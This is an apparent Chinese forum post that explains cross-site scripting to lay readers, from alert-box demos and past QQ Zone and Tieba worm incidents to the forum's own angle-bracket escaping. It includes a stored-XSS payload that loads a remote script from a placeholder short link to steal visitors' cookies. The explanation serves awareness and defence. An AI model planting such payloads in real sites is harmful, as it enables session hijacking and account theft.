XSS是跨站脚本攻击的别称（英文为Cross Site Scripting，但通常写成XSS以便于和另一项网页技术级联样式表CSS区分开），那么XSS技术可以用来干什么呢？



可以拿来盗号！！！！


就在几年前相信大家都有着这样的经历或者听说过这样的案例，点开某人的QQ空间后，自己的QQ账号就莫名其妙地去发一些H广告甚至被盗了，而就在去年，百度贴吧也是几乎一瞬间多了一堆奇怪的帖子，只要点进去后，自己的账号也开始自动开始狂发这种帖子，如果是吧务点进去后，大吧主会开掉小吧主，小吧主们互相封禁。。。。前者就是XSS攻击的实例，后者更为恶劣并且更加高级，这已经一种自动化并且能传播形式的攻击了，这就是XSS蠕虫。


盗号的受害者也并不一定是用户，因为网站的管理员也是一个超级用户，如果管理员被盗号，那么损失的是整个网站


现代的网页是由HTML语言和JavaScript脚本构成的，JavaScript可以嵌入到HTML文件里面，比如<script>alert("hello")</script>这样的语句，如果写到HTML文件里面，浏览器遇到<script></script>这样的标签就会执行里面的内容，这段代码是弹出一个窗口显示“hello”。


而网站或者论坛上面通常会有一些留言板块，这些板块的原理是把你写的内容提交到网站的数据库里面，然后第二个人浏览的时候，把数据库里面的信息查询出来返回给第二个用户浏览器，这个用户的浏览器在把这些内容渲染出来。
像下面的这个板块：




那么如果发帖的用户是黑阔，发的是一段JavaScript代码，如下面这样，第二个用户浏览了会怎么样呢？




结果是弹出一个框来

为什么会弹出框呢，可以关掉这个框用选中发帖内容右键-查看源代码看看黑阔发的贴变成了什么代码

看见没有，原来发的代码<script>alert()</script>变成了网页内容的一部分了，浏览器把它当做JavaScript命令执行了，自然会弹出一个框来。
但是我的这篇文章发了出来，里面有那么多<script>alert()</script>，为什么科创又不会弹出窗口呢？


原因是科创使用的phpwind系统在发帖的时候做了过滤，把尖括号给转义了，变成了<script>alert()</script>这样的代码，这样你的浏览器就把这些<script>alert()</script>当做普通文字处理了。这样你也就安全了。


如果只是弹一个框，感觉似乎没有什么用，可是我们把XSS语句改成这样的语句呢


<script src=XXXXXXXXXXX/RLfh4wn></script>


从代码上看，这段语句调用 了一个不知名的网站上面的链接（XXXX是一个生成的短链接，可以用新浪生成），这个链接实际上是一个JavsScript脚本，它会干很多事情，其中就包括获取你的cookie，然后发送到另一个网站上面去。
这段脚本在后台悄悄地执行，不会弹框，你不会发现任何痕迹。


黑阔获取了你的cookie之后，就可以利用你的cookie伪造登陆，然后动用你的账号做任何事情了